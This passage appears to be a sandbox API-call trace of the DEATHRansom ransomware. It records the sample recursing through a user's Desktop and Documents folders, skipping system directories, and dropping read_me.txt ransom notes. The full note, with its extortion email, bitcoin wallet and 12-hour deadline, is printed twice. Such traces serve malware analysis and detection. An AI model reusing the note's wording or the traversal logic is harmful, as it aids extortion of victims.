ftCreationTime.dwHighDateTime=0x1d4cf7d, ftLastAccessTime.dwLowDateTime=0xb4f42b00, ftLastAccessTime.dwHighDateTime=0x1d4d31d, ftLastWriteTime.dwLowDateTime=0xb4f42b00, ftLastWriteTime.dwHighDateTime=0x1d4d31d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ReE1ZSiCxXt 9A", cAlternateFileName="REE1ZS~1")) returned 1 [0075.255] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A") returned 56 [0075.255] lstrcmpW (lpString1="ReE1ZSiCxXt 9A", lpString2="..") returned 1 [0075.255] lstrcmpW (lpString1="ReE1ZSiCxXt 9A", lpString2=".") returned 1 [0075.255] StrStrW (lpFirst="ree1zsicxxt 9a", lpSrch="programdata") returned 0x0 [0075.255] StrStrW (lpFirst="ree1zsicxxt 9a", lpSrch="$recycle.bin") returned 0x0 [0075.255] StrStrW (lpFirst="ree1zsicxxt 9a", lpSrch="program files") returned 0x0 [0075.255] StrStrW (lpFirst="ree1zsicxxt 9a", lpSrch="windows") returned 0x0 [0075.255] StrStrW (lpFirst="ree1zsicxxt 9a", lpSrch="all users") returned 0x0 [0075.255] StrStrW (lpFirst="ree1zsicxxt 9a", lpSrch="appdata") returned 0x0 [0075.255] GetProcessHeap () returned 0x4f10000 [0075.255] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b500b0 [0075.255] lstrcpyW (in: lpString1=0x8b500b0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A" [0075.255] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 43 [0075.255] QueueUserWorkItem (Function=0x40a710, Context=0x8b500b0, Flags=0x0) returned 1 [0075.255] GetProcessHeap () returned 0x4f10000 [0075.255] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b700c0 [0075.255] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\*") returned 58 [0075.255] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc13f9be0, ftCreationTime.dwHighDateTime=0x1d4cf7d, ftLastAccessTime.dwLowDateTime=0xb4f42b00, ftLastAccessTime.dwHighDateTime=0x1d4d31d, ftLastWriteTime.dwLowDateTime=0xb4f42b00, ftLastWriteTime.dwHighDateTime=0x1d4d31d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9a8 [0075.256] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\.") returned 58 [0075.256] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.256] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.256] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc13f9be0, ftCreationTime.dwHighDateTime=0x1d4cf7d, ftLastAccessTime.dwLowDateTime=0xb4f42b00, ftLastAccessTime.dwHighDateTime=0x1d4d31d, ftLastWriteTime.dwLowDateTime=0xb4f42b00, ftLastWriteTime.dwHighDateTime=0x1d4d31d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.256] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\..") returned 59 [0075.256] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.256] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe528ea60, ftCreationTime.dwHighDateTime=0x1d4c60f, ftLastAccessTime.dwLowDateTime=0xe25c7a90, ftLastAccessTime.dwHighDateTime=0x1d4c628, ftLastWriteTime.dwLowDateTime=0xe25c7a90, ftLastWriteTime.dwHighDateTime=0x1d4c628, nFileSizeHigh=0x0, nFileSizeLow=0xa016, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="9Yj0SX-7Wg6MAp811z.ppt", cAlternateFileName="9YJ0SX~1.PPT")) returned 1 [0075.256] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\9Yj0SX-7Wg6MAp811z.ppt") returned 79 [0075.256] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa686faf0, ftCreationTime.dwHighDateTime=0x1d4cf0f, ftLastAccessTime.dwLowDateTime=0x5348acd0, ftLastAccessTime.dwHighDateTime=0x1d4cd70, ftLastWriteTime.dwLowDateTime=0x5348acd0, ftLastWriteTime.dwHighDateTime=0x1d4cd70, nFileSizeHigh=0x0, nFileSizeLow=0x2856, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="K-xcXNu.mp3", cAlternateFileName="")) returned 1 [0075.256] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\K-xcXNu.mp3") returned 68 [0075.256] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70378d10, ftCreationTime.dwHighDateTime=0x1d4c95c, ftLastAccessTime.dwLowDateTime=0xcc156620, ftLastAccessTime.dwHighDateTime=0x1d4d253, ftLastWriteTime.dwLowDateTime=0xcc156620, ftLastWriteTime.dwHighDateTime=0x1d4d253, nFileSizeHigh=0x0, nFileSizeLow=0x1450b, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="oOrJCH_u4fw7H.docx", cAlternateFileName="OORJCH~1.DOC")) returned 1 [0075.256] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\oOrJCH_u4fw7H.docx") returned 75 [0075.256] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x627bbc10, ftCreationTime.dwHighDateTime=0x1d4cde8, ftLastAccessTime.dwLowDateTime=0xdcd766e0, ftLastAccessTime.dwHighDateTime=0x1d4c914, ftLastWriteTime.dwLowDateTime=0xdcd766e0, ftLastWriteTime.dwHighDateTime=0x1d4c914, nFileSizeHigh=0x0, nFileSizeLow=0xae29, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PEWZ_zvD.doc", cAlternateFileName="")) returned 1 [0075.256] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\PEWZ_zvD.doc") returned 69 [0075.256] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e387740, ftCreationTime.dwHighDateTime=0x1d4cb2e, ftLastAccessTime.dwLowDateTime=0x545ca0c0, ftLastAccessTime.dwHighDateTime=0x1d4caf2, ftLastWriteTime.dwLowDateTime=0x545ca0c0, ftLastWriteTime.dwHighDateTime=0x1d4caf2, nFileSizeHigh=0x0, nFileSizeLow=0x11bdc, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VhdNesE9RHAIm.pps", cAlternateFileName="VHDNES~1.PPS")) returned 1 [0075.256] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\VhdNesE9RHAIm.pps") returned 74 [0075.256] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c4bcc0, ftCreationTime.dwHighDateTime=0x1d4cee6, ftLastAccessTime.dwLowDateTime=0x38160200, ftLastAccessTime.dwHighDateTime=0x1d4c8b1, ftLastWriteTime.dwLowDateTime=0x38160200, ftLastWriteTime.dwHighDateTime=0x1d4c8b1, nFileSizeHigh=0x0, nFileSizeLow=0x8324, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ZOgYMomyZE0.png", cAlternateFileName="ZOGYMO~1.PNG")) returned 1 [0075.256] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\ZOgYMomyZE0.png") returned 72 [0075.256] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c4bcc0, ftCreationTime.dwHighDateTime=0x1d4cee6, ftLastAccessTime.dwLowDateTime=0x38160200, ftLastAccessTime.dwHighDateTime=0x1d4c8b1, ftLastWriteTime.dwLowDateTime=0x38160200, ftLastWriteTime.dwHighDateTime=0x1d4c8b1, nFileSizeHigh=0x0, nFileSizeLow=0x8324, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ZOgYMomyZE0.png", cAlternateFileName="ZOGYMO~1.PNG")) returned 0 [0075.256] FindClose (in: hFindFile=0x7cfe9a8 | out: hFindFile=0x7cfe9a8) returned 1 [0075.256] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\read_me.txt") returned 68 [0075.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ree1zsicxxt 9a\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b4 [0075.257] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.257] WriteFile (in: hFile=0x7b4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.257] CloseHandle (hObject=0x7b4) returned 1 [0075.258] GetProcessHeap () returned 0x4f10000 [0075.258] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b700c0 | out: hHeap=0x4f10000) returned 1 [0075.258] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec0b2b00, ftCreationTime.dwHighDateTime=0x1d4cf82, ftLastAccessTime.dwLowDateTime=0xc0dca30, ftLastAccessTime.dwHighDateTime=0x1d4c6a9, ftLastWriteTime.dwLowDateTime=0xc0dca30, ftLastWriteTime.dwHighDateTime=0x1d4c6a9, nFileSizeHigh=0x0, nFileSizeLow=0x1316c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="S_xV8DrCXA1qqj8mB.swf", cAlternateFileName="S_XV8D~1.SWF")) returned 1 [0075.258] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\S_xV8DrCXA1qqj8mB.swf") returned 63 [0075.258] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8bf10c0, ftCreationTime.dwHighDateTime=0x1d4d54f, ftLastAccessTime.dwLowDateTime=0x4724c4a0, ftLastAccessTime.dwHighDateTime=0x1d4cacf, ftLastWriteTime.dwLowDateTime=0x4724c4a0, ftLastWriteTime.dwHighDateTime=0x1d4cacf, nFileSizeHigh=0x0, nFileSizeLow=0xd4fb, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="T-qEmnB.m4a", cAlternateFileName="")) returned 1 [0075.258] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\T-qEmnB.m4a") returned 53 [0075.258] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdff963a0, ftCreationTime.dwHighDateTime=0x1d4d265, ftLastAccessTime.dwLowDateTime=0x7d5de110, ftLastAccessTime.dwHighDateTime=0x1d4cfe2, ftLastWriteTime.dwLowDateTime=0x7d5de110, ftLastWriteTime.dwHighDateTime=0x1d4cfe2, nFileSizeHigh=0x0, nFileSizeLow=0xe4c2, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="tHkYo.gif", cAlternateFileName="")) returned 1 [0075.258] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tHkYo.gif") returned 51 [0075.258] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70ce8970, ftCreationTime.dwHighDateTime=0x1d4c689, ftLastAccessTime.dwLowDateTime=0xde7f9430, ftLastAccessTime.dwHighDateTime=0x1d4d37e, ftLastWriteTime.dwLowDateTime=0xde7f9430, ftLastWriteTime.dwHighDateTime=0x1d4d37e, nFileSizeHigh=0x0, nFileSizeLow=0x32f7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="tKb0W.m4a", cAlternateFileName="")) returned 1 [0075.258] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tKb0W.m4a") returned 51 [0075.258] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb414470, ftCreationTime.dwHighDateTime=0x1d4d0b8, ftLastAccessTime.dwLowDateTime=0x3f731390, ftLastAccessTime.dwHighDateTime=0x1d4c5d1, ftLastWriteTime.dwLowDateTime=0x3f731390, ftLastWriteTime.dwHighDateTime=0x1d4c5d1, nFileSizeHigh=0x0, nFileSizeLow=0x1427f, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="uhNakSJy2.m4a", cAlternateFileName="UHNAKS~1.M4A")) returned 1 [0075.258] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uhNakSJy2.m4a") returned 55 [0075.258] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe2cd600, ftCreationTime.dwHighDateTime=0x1d5a040, ftLastAccessTime.dwLowDateTime=0xfe2cd600, ftLastAccessTime.dwHighDateTime=0x1d5a040, ftLastWriteTime.dwLowDateTime=0xfa994f00, ftLastWriteTime.dwHighDateTime=0x1d5a040, nFileSizeHigh=0x0, nFileSizeLow=0x3b000, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Wacatac_2019-11-20_19-54.exe", cAlternateFileName="WACATA~1.EXE")) returned 1 [0075.258] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wacatac_2019-11-20_19-54.exe") returned 70 [0075.258] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x446db200, ftCreationTime.dwHighDateTime=0x1d4cf50, ftLastAccessTime.dwLowDateTime=0xebd30d40, ftLastAccessTime.dwHighDateTime=0x1d4c72d, ftLastWriteTime.dwLowDateTime=0xebd30d40, ftLastWriteTime.dwHighDateTime=0x1d4c72d, nFileSizeHigh=0x0, nFileSizeLow=0x8588, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WiZ2x.m4a", cAlternateFileName="")) returned 1 [0075.258] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WiZ2x.m4a") returned 51 [0075.258] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5018cb0, ftCreationTime.dwHighDateTime=0x1d4cf0b, ftLastAccessTime.dwLowDateTime=0x6c246870, ftLastAccessTime.dwHighDateTime=0x1d4c9a1, ftLastWriteTime.dwLowDateTime=0x6c246870, ftLastWriteTime.dwHighDateTime=0x1d4c9a1, nFileSizeHigh=0x0, nFileSizeLow=0xf675, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="z_3uPlAJZMtKG.mkv", cAlternateFileName="Z_3UPL~1.MKV")) returned 1 [0075.258] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\z_3uPlAJZMtKG.mkv") returned 59 [0075.258] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a371300, ftCreationTime.dwHighDateTime=0x1d4cc1b, ftLastAccessTime.dwLowDateTime=0xe6b73700, ftLastAccessTime.dwHighDateTime=0x1d4cbab, ftLastWriteTime.dwLowDateTime=0xe6b73700, ftLastWriteTime.dwHighDateTime=0x1d4cbab, nFileSizeHigh=0x0, nFileSizeLow=0x4971, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="_btdHeL3.png", cAlternateFileName="")) returned 1 [0075.258] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_btdHeL3.png") returned 54 [0075.258] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a371300, ftCreationTime.dwHighDateTime=0x1d4cc1b, ftLastAccessTime.dwLowDateTime=0xe6b73700, ftLastAccessTime.dwHighDateTime=0x1d4cbab, ftLastWriteTime.dwLowDateTime=0xe6b73700, ftLastWriteTime.dwHighDateTime=0x1d4cbab, nFileSizeHigh=0x0, nFileSizeLow=0x4971, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="_btdHeL3.png", cAlternateFileName="")) returned 0 [0075.258] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0075.258] wnsprintfW (in: pszDest=0x8b300a0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\read_me.txt") returned 53 [0075.258] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a0 [0075.259] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.259] WriteFile (in: hFile=0x7a0, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.260] CloseHandle (hObject=0x7a0) returned 1 [0075.260] GetProcessHeap () returned 0x4f10000 [0075.260] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b300a0 | out: hHeap=0x4f10000) returned 1 [0075.260] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2426610, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2426610, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0075.260] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 43 [0075.260] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0075.260] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0075.260] StrStrW (lpFirst="documents", lpSrch="programdata") returned 0x0 [0075.260] StrStrW (lpFirst="documents", lpSrch="$recycle.bin") returned 0x0 [0075.260] StrStrW (lpFirst="documents", lpSrch="program files") returned 0x0 [0075.260] StrStrW (lpFirst="documents", lpSrch="windows") returned 0x0 [0075.260] StrStrW (lpFirst="documents", lpSrch="all users") returned 0x0 [0075.260] StrStrW (lpFirst="documents", lpSrch="appdata") returned 0x0 [0075.260] GetProcessHeap () returned 0x4f10000 [0075.260] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b300a0 [0075.260] lstrcpyW (in: lpString1=0x8b300a0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0075.260] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 44 [0075.260] QueueUserWorkItem (Function=0x40a710, Context=0x8b300a0, Flags=0x0) returned 1 [0075.260] GetProcessHeap () returned 0x4f10000 [0075.260] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b700c0 [0075.260] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*") returned 45 [0075.260] FindFirstFileW (in: 